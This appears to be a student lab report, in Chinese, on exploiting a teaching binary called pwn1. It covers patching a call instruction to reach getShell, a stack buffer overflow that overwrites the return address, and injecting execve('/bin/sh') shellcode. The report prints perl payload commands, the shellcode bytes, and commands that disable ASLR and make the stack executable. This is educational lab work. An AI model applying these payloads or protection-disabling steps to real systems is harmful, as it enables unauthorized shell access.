20164319 刘蕴哲 Exp1 PC平台逆向破解

【实践内容概述】

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

【实践内容】

1.手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

2.利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

3.注入一个自己制作的shellcode并运行这段shellcode。

（这几种思路，基本代表现实情况中的攻击目标）

1.运行原本不可访问的代码片段

2.强行修改程序执行流

3.注入运行任意代码。

【基础知识】

熟悉Linux基本操作 。

认识常用指令,如管道（|），输入、输出重定向（>）等。

理解Bof的原理。

看懂汇编、机器指令、EIP、指令地址。

会使用gdb,vi。

【实践步骤】

part.1[修改程序机器指令，改变程序执行流程]

需要掌握知识点：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具

注意要点：

*NOP, JNE, JE, JMP, CMP汇编指令的机器码

*反汇编指令objdump：

objdump反汇编命令：
objdump -f test     //显示test的文件头信息
objdump -d test    //反汇编test中的需要执行指令的那些section
objdump -D test    //与-d类似，但反汇编test中的所有section
objdump -h test    //显示test的Section Header信息
objdump -x test    //显示test的全部Header信息
objdump -s test    //除了显示test的全部Header信息，还显示他们对应的十六进制文件代码    

xxd命令：

用vi命令打开一个文件，在vi命令模式下输入
:%!xxd            //回车后，该文件会以十六进制形式显示
:%!xxd -r         //参数-r是指将当前的十六进制转换为二进制

在认识了反汇编指令之后，首先我们在桌面 /Desktop 的路径上打开终端，测试成功之后输入

objdump -d 20164319pwn1

对命名为“20164319pwn1”的文件进行反汇编。

*修改指令改变程序执行流程（实际举例）

这里可以看到main函数调用foo，对应机器指令为“ e8 d7ffffff”，

那我们想让它调用getShell，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行。

用Windows计算器，直接 47d-4ba就能得到补码，是c3ffffff。

修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff。

首先输入

vim 20164319pwn1

进行编辑模式之后输入

:%!xxd

将显示模式切换为16进制模式如图

定位到需要修改的地方，输入

/e8d7

将“d7”修改为“c3”，按ESC键退出编辑模式

键入：

:%!xxd -r
:wq

转换16进制为原格式并保存

然后再反汇编一下看看call指令是否正确调用getshell：

objdump -d 20164319pwn1 | more

　　

part.2[通过构造输入参数，造成BOF攻击，改变程序执行流]

需要掌握知识点：堆栈结构，返回地址

这里使用修改前的pwn1文件，命名为“lyzpwn1”，由于main 函数调用 foo 函数，foo 函数中存在 Buffer overflow 漏洞，我们的目标是让溢出的字节覆盖返回地址（如下图，当输入达到28B时产生溢出）

为了确认输入字符串哪几个字符会覆盖到返回地址，用gdb命令调试，输入一个48bit的字符串

输入

info r

查看当前寄存器状态，发现EIP寄存器被0x35353535覆盖，即当前返回地址为5555，这就说明刚刚输入的48B字符串中，含有5的字符串溢出到了EIP中

精确判断字符串中的溢出位置，将“55555555”替换为“12345678”，继续调试，观察具体是哪几个数字溢出到了EIP寄存器中

发现“1234”那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

为了确认用什么值来覆盖返回地址，即getShell的内存地址，反汇编时可以看到，即0804847d（代码中的顺序应为：\x7d\x84\04\08）

紧接着，构造输入字符串，因为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。\x0a表示回车，如果没有的话，在程序运行时就需要手工按一下回车键。

键入

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

　　

使用16进制指令查看文件的内容是否如预期

xxd input

将input的输入，通过管道符“|”，作为lyzpwn1的输入，获得shell

(cat input; cat) | ./lyzpwn1

part.3[注入Shellcode并执行]

*shellcode就是一段机器指令（code）

通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），

所以这段机器指令被称为shellcode。

在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

我们按照实验指导的要求，复制文件命名为“4319pwn1”，并给出以下shellcode：

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

准备工作，修改配置，提示找不到execstack命令，先输入命令进行安装

apt-get install execstack

然后键入如图

root@kali:~/桌面# execstack -s pwn1　　　　　　　　　　　　　　　　　　　　//设置堆栈可执行
root@kali:~/桌面# execstack -q pwn1　　　　　　　　　　　　　　　　　　　　//查询文件的堆栈是否可执行
X pwn1
root@kali:~/桌面# more /proc/sys/kernel/randomize_va_space
2
root@kali:~/桌面# echo "0" > /proc/sys/kernel/randomize_va_space　　//关闭地址随机化
root@kali:~/桌面# more /proc/sys/kernel/randomize_va_space
0
root@kali:~/桌面#

*构造需要注入的Payload

Linux下有两种基本构造攻击buf的方法：

（1）retaddr + nop + shellcode

（2）nop + shellcode + retaddr

由于retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面

缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边

我们这个buf够放这个shellcode了

结构为：nops+shellcode+retaddr。

nop一为是了填充，二是作为“着陆区/滑行区”。

我们猜的返回地址只要落在任何一个nop上，自然会滑到我们的shellcode。

首先，构造32个字符“A”，其后为retaddr + nop + shellcode

perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

接下来需要确定返回地址（即/x4/x3/x2/x1）需要填什么，因此，注入这段buf如图

(cat input_shellcode;cat) | ./4319pwn1

再开另外一个终端，用gdb来调试4319pwn1这个进程（在此之前，需要找到4319pwn1执行的进程号）

ps -ef | grep 4319pwn1　　　　//找到4319pwn1的进程号
gdb　　　　　　　　　　　　 //启动gdb调试这个进程
attach 　　　　　　　　//gdb关联4319pwn1这个进程，开始调试
disassemble foo　　　　　 //通过设置断点，来查看注入buf的内存地址
break *0x080484ae　　　　//在另外一个终端中按下回车
c　　　　　　　　　　　　　　//continue

键入

info r esp

查看esp寄存器，确定/x4/x3/x2/x1该填什么。

如图，看到01020304了，就是返回地址的位置0xffffd2bc。shellcode就挨着，所以地址是0xffffd2c0,xc0/xd2/xff/xff/就是我们要找的。

*十六进制bit算法，（一开始脑子有点转不过来，差点算错，不知道瞎理解的对不对）相邻间隔4bit，换算这里bc转化为二进制“1011 1100”加上“0000 0100”异或为“1100 0000”即为“c0”

如图，获得shell:

（到此，实验部分总算是做完了）

【思想感悟】

这个实验从时间上看我陆陆续续做了很久，中间一直有大大小小的问题，主要还是出于对kali和linux系统的不熟悉，在此我要感谢老师的悉心指导，以及在课下帮我排除问题的同学和耐心指导我们组员的小组长！！！！真的很感谢，第一次做网络对抗技术的实验，让我有点紧张和害怕，一直迟迟不敢动手。但是对照着实验指导结合网上查资料，真正认真研究了之后，我每天研究一点，分好几天看懂了实验内容。总结一下这几天的感悟就是：有问题多问，比起在那里苦思冥想，直接上手操作得来感悟更真切！而且每个人的机器操作方面的问题都可能不一样，这样更有益于我们排查问题，琢磨实践内容和加深对知识点的理解。虽然大体上主要要求掌握的内容我都理解了，但是也有一部分拓展内容我不是很懂。虽然实践内容在多方求证和反复研究实践下做出来了，但是这也让我认识到自己在专业知识领域的不足，下定决心要好好研究这方面的内容，这次的实践真正让我感受到了这门课程的有趣之处（虽然头疼的地方也不少），但是我想相信好的开头会带来一个好的方向！也希望我在以后的实验里能越来越熟练，做的越来越快，尽量独立自主的理解全部实验内容。